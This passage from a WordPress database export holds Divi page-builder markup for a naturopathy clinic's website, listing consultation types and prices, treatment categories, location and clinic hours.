custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span><br /><br /></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\"></span></strong></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2025-03-14 13:55:40','2025-03-14 05:55:40','',28,'https://verdenaturopathy.com.au/?p=417',0,'revision','',0),(427,1,'2025-04-01 19:56:12','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2025-04-01 19:56:12','0000-00-00 00:00:00','',0,'https://verdenaturopathy.com.au/?p=427',1,'nav_menu_item','',0),(428,1,'2025-04-01 19:58:59','2025-04-01 11:56:46',' ','','','publish','closed','closed','','428','','','2025-04-01 19:58:59','2025-04-01 11:58:59','',0,'https://verdenaturopathy.com.au/?p=428',4,'nav_menu_item','',0),(431,1,'2025-04-01 20:01:53','2025-04-01 12:01:53','<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">Consultations</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Choose from face-to-face or online consults</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (60 min) - $185\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]\n\n<span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span>\n\n<span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span>\n\n<span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span>\n\n \n\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $90\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]\n\n<span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span>\n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\" width=\"100%\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $65\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]\n\n<span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.\n\n \n\n[/et_pb_blurb][/et_pb_column][/et_pb_row]\n<!-- /wp:shortcode -->\n\n<!-- wp:shortcode -->\n[et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]\n<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row]\n<!-- /wp:shortcode -->\n\n<!-- wp:shortcode -->\n[et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]\n<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span>\n\n[/et_pb_text][/et_pb_column][/et_pb_row]\n<!-- /wp:shortcode -->\n\n<!-- wp:shortcode -->\n[et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span>\nCapsules/tablets\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>[et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]</p>\n<!-- /wp:paragraph -->','Services','','inherit','closed','closed','','424-revision-v1','','','2025-04-01 20:01:53','2025-04-01 12:01:53','',424,'https://verdenaturopathy.com.au/?p=431',0,'revision','',0),(434,1,'2025-04-01 20:08:34','2025-04-01 12:08:34','[et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\" template_type=\"section\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<span style=\"font-family: Montserrat;\">Kalamunda & online</span>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#ccd4c8\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span>\n<span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span>\n<span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','clinic info 1','','publish','closed','closed','','clinic-info-1','','','2025-04-01 20:08:34','2025-04-01 12:08:34','',0,'https://verdenaturopathy.com.au/et_pb_layout/clinic-info-1/',0,'et_pb_layout','',0),(435,1,'2025-04-01 20:09:48','2025-04-01 12:09:48','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\" custom_padding=\"||0px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial 